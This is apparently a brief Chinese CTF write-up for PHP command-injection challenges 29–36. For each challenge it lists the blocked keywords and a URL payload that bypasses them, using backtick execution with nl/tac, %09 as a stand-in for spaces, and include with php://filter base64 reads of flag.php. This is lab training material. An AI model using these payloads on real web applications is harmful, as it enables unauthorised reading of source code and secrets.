29
源代码给了禁用flag
使用tac、nl
?c=echo `nl f*`;
?c=echo `tac f*`;30
多禁用了system和php
和上题区别不大,使用上一题命令就能解
?c=echo `nl f*`;
?c=echo `tac f*`;
31
禁用了空格使用%09代替
?c=echo%09`tac%09f*`;
32
禁用了echo
使用php伪协议
?c=include$_GET["1"]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
最后解一下base64就行了
33
多过滤了"
?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
34-36
一样命令就可以得到flag
